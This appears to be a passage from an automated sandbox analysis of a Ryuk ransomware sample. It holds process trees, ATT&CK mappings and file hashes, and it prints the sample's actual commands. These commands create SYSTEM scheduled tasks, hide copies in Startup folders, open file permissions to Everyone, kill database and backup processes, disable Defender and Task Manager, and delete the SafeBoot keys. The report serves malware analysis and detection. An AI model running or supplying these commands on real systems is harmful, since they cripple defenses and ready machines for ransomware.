PID 4116 wrote to memory of 4736	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4736 wrote to memory of 1352	4736	cmd.exe	schtasks.exe
PID 4736 wrote to memory of 1352	4736	cmd.exe	schtasks.exe
PID 4116 wrote to memory of 116	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 116	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 116 wrote to memory of 1780	116	cmd.exe	attrib.exe
PID 116 wrote to memory of 1780	116	cmd.exe	attrib.exe
PID 4116 wrote to memory of 3552	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 3552	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3552 wrote to memory of 1748	3552	cmd.exe	attrib.exe
PID 3552 wrote to memory of 1748	3552	cmd.exe	attrib.exe
PID 4116 wrote to memory of 1920	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 1920	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 3064	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 3064	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 1920 wrote to memory of 1384	1920	cmd.exe	cmd.exe
PID 1920 wrote to memory of 1384	1920	cmd.exe	cmd.exe
PID 4116 wrote to memory of 3828	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 3828	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3828 wrote to memory of 3580	3828	cmd.exe	cmd.exe
PID 3828 wrote to memory of 3580	3828	cmd.exe	cmd.exe
PID 3064 wrote to memory of 3508	3064	cmd.exe	reg.exe
PID 3064 wrote to memory of 3508	3064	cmd.exe	reg.exe
PID 3828 wrote to memory of 2752	3828	cmd.exe	taskkill.exe
PID 3828 wrote to memory of 2752	3828	cmd.exe	taskkill.exe
PID 1384 wrote to memory of 4720	1384	cmd.exe	icacls.exe
PID 1384 wrote to memory of 4720	1384	cmd.exe	icacls.exe
PID 4116 wrote to memory of 1188	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 1188	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3580 wrote to memory of 3380	3580	cmd.exe	taskkill.exe
PID 3580 wrote to memory of 3380	3580	cmd.exe	taskkill.exe
PID 4116 wrote to memory of 2304	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 2304	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 4964	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 4964	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 3504	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 3504	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 1048	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 1048	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 1904	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4116 wrote to memory of 1904	4116	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 1904 wrote to memory of 4960	1904	cmd.exe	reg.exe
PID 1904 wrote to memory of 4960	1904	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

4944 attrib.exe
1780 attrib.exe
1748 attrib.exe

pid	process
4944	attrib.exe
1780	attrib.exe
1748	attrib.exe

C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
"C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4824

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:4184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:3292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4828

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:2432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:4944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:920

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:2692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4736

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe" /F
3⤵
- Creates scheduled task(s)
PID:1352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:116

C:\Windows\system32\attrib.exe
attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:1780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:1748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:1920

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:4720

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:3828

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
- Suspicious use of WriteProcessMemory
PID:3580

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3380

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3064

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:3508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:1188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:2304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:4964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:3504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:1048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:4960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:3464

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:3968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:4232

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:4172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:408

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:2428

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID
Filesize
8B

MD5
b01925eb79aff868999d7be561726324

SHA1
b005a53561fa9014d5c7cb0bf3957dfa57a7bada

SHA256
b903fbfd70ec7520a68c3492f98ade4bf7ef8fd59353108faa7ea9583e2b1351

SHA512
f47764a971de47e8ca400e60ea950a339c86b213c20c29b392bfc9f83750280050f2d0ebd4d4d36cd4b956c906df31b543b394dcf42e3f92797f8eb044630b74

Download Submit
C:\ProgramData\RyukReadMe.txt
Filesize
1KB

MD5
fdb92b73b4370f248e57b5292cb4b507

SHA1
5d86a3818e4c38d4821372900f21f8ec62d97efc

SHA256
40f33de8d0fd8293c3d03b3b2a043c7e4e96393510e686b90acebf485bbf0477

SHA512
76b35870a8c7a29a0ce36e548531dc6b09abb51b52781835c87fb7e6c276b84948137aa9f001b717ca0b9ffb0b27f47bae5fbb1be483aa74dbd2542409c387a9

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
ff8feba02850750ae3acad613386c7ed

SHA1
1421b720388fa05fddf2a862f3994bc181b489be

SHA256
85c14336594b6da93be145ee495414f6550b1e9f47728a31e1acb7d822ecd945

SHA512
e8765fe8fd3413b833fbd2b0e76ea0e71b6079acf78a8ba7dc4adf19af00b7749eb48030e3cd62933b3842fd8d2d12e7bb4cdc64f33fdb1953282e83a63063ec

Download Submit
C:\ProgramData\hrmlog1
Filesize
2KB

MD5
ff8feba02850750ae3acad613386c7ed

SHA1
1421b720388fa05fddf2a862f3994bc181b489be

SHA256
85c14336594b6da93be145ee495414f6550b1e9f47728a31e1acb7d822ecd945

SHA512
e8765fe8fd3413b833fbd2b0e76ea0e71b6079acf78a8ba7dc4adf19af00b7749eb48030e3cd62933b3842fd8d2d12e7bb4cdc64f33fdb1953282e83a63063ec

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
2c0abc2f3a1febd00ca8f8fee4bd2683

SHA1
56e1028e3bd457270089d470af7b3edbb344aca8

SHA256
f4942012d19f5ae56209c3b9c1b6cb6a7ee4b5dcd0dc0e74a93bb8ad6f52d6a1

SHA512
5ad31220773af2ddef907f85908e334f433675db8863559df6ff7afde29771539a7938d710f2cfc6f225916c5bf7d5b96566fe856d924c0fb7ff57829b603bbc

Download Submit
C:\ProgramData\hrmlog2
Filesize
292B

MD5
2c0abc2f3a1febd00ca8f8fee4bd2683

SHA1
56e1028e3bd457270089d470af7b3edbb344aca8

SHA256
f4942012d19f5ae56209c3b9c1b6cb6a7ee4b5dcd0dc0e74a93bb8ad6f52d6a1

SHA512
5ad31220773af2ddef907f85908e334f433675db8863559df6ff7afde29771539a7938d710f2cfc6f225916c5bf7d5b96566fe856d924c0fb7ff57829b603bbc

Download Submit
C:\ProgramData\ryuk.exe
Filesize
885KB

MD5
622bc38dee08e70e91e2be32a58b6d1f

SHA1
7cfec4859fa7ca178095983b3f174f842a44b0c2

SHA256
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

SHA512
176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize
8B

MD5
b01925eb79aff868999d7be561726324

SHA1
b005a53561fa9014d5c7cb0bf3957dfa57a7bada

SHA256
b903fbfd70ec7520a68c3492f98ade4bf7ef8fd59353108faa7ea9583e2b1351

SHA512
f47764a971de47e8ca400e60ea950a339c86b213c20c29b392bfc9f83750280050f2d0ebd4d4d36cd4b956c906df31b543b394dcf42e3f92797f8eb044630b74

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize
2KB

MD5
ff8feba02850750ae3acad613386c7ed

SHA1
1421b720388fa05fddf2a862f3994bc181b489be

SHA256
85c14336594b6da93be145ee495414f6550b1e9f47728a31e1acb7d822ecd945

SHA512
e8765fe8fd3413b833fbd2b0e76ea0e71b6079acf78a8ba7dc4adf19af00b7749eb48030e3cd62933b3842fd8d2d12e7bb4cdc64f33fdb1953282e83a63063ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize
292B

MD5
2c0abc2f3a1febd00ca8f8fee4bd2683

SHA1
56e1028e3bd457270089d470af7b3edbb344aca8

SHA256
f4942012d19f5ae56209c3b9c1b6cb6a7ee4b5dcd0dc0e74a93bb8ad6f52d6a1

SHA512
5ad31220773af2ddef907f85908e334f433675db8863559df6ff7afde29771539a7938d710f2cfc6f225916c5bf7d5b96566fe856d924c0fb7ff57829b603bbc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize
885KB

MD5
622bc38dee08e70e91e2be32a58b6d1f

SHA1
7cfec4859fa7ca178095983b3f174f842a44b0c2

SHA256
be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

SHA512
176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d

Download Submit
memory/116-146-0x0000000000000000-mapping.dmp

Download
memory/408-179-0x0000000000000000-mapping.dmp

Download
memory/920-142-0x0000000000000000-mapping.dmp

Download
memory/1048-171-0x0000000000000000-mapping.dmp

Download
memory/1188-160-0x0000000000000000-mapping.dmp

Download
memory/1352-145-0x0000000000000000-mapping.dmp

Download
memory/1384-152-0x0000000000000000-mapping.dmp

Download
memory/1560-139-0x0000000000000000-mapping.dmp

Download
memory/1740-133-0x0000000000000000-mapping.dmp

Download
memory/1748-149-0x0000000000000000-mapping.dmp

Download
memory/1780-147-0x0000000000000000-mapping.dmp

Download
memory/1904-173-0x0000000000000000-mapping.dmp

Download
memory/1920-150-0x0000000000000000-mapping.dmp

Download
memory/2304-163-0x0000000000000000-mapping.dmp

Download
memory/2428-180-0x0000000000000000-mapping.dmp

Download
memory/2432-138-0x0000000000000000-mapping.dmp

Download
memory/2692-143-0x0000000000000000-mapping.dmp

Download
memory/2752-156-0x0000000000000000-mapping.dmp

Download
memory/3064-151-0x0000000000000000-mapping.dmp

Download
memory/3292-136-0x0000000000000000-mapping.dmp

Download
memory/3380-161-0x0000000000000000-mapping.dmp

Download
memory/3464-175-0x0000000000000000-mapping.dmp

Download
memory/3504-169-0x0000000000000000-mapping.dmp

Download
memory/3508-155-0x0000000000000000-mapping.dmp

Download
memory/3552-148-0x0000000000000000-mapping.dmp

Download
memory/3580-154-0x0000000000000000-mapping.dmp

Download
memory/3828-153-0x0000000000000000-mapping.dmp

Download
memory/3968-176-0x0000000000000000-mapping.dmp

Download
memory/4172-178-0x0000000000000000-mapping.dmp

Download
memory/4184-134-0x0000000000000000-mapping.dmp

Download
memory/4232-177-0x0000000000000000-mapping.dmp

Download
memory/4720-157-0x0000000000000000-mapping.dmp

Download
memory/4736-144-0x0000000000000000-mapping.dmp

Download
memory/4824-132-0x0000000000000000-mapping.dmp

Download
memory/4828-137-0x0000000000000000-mapping.dmp

Download
memory/4944-140-0x0000000000000000-mapping.dmp

Download
memory/4960-174-0x0000000000000000-mapping.dmp

Download
memory/4964-165-0x0000000000000000-mapping.dmp

Download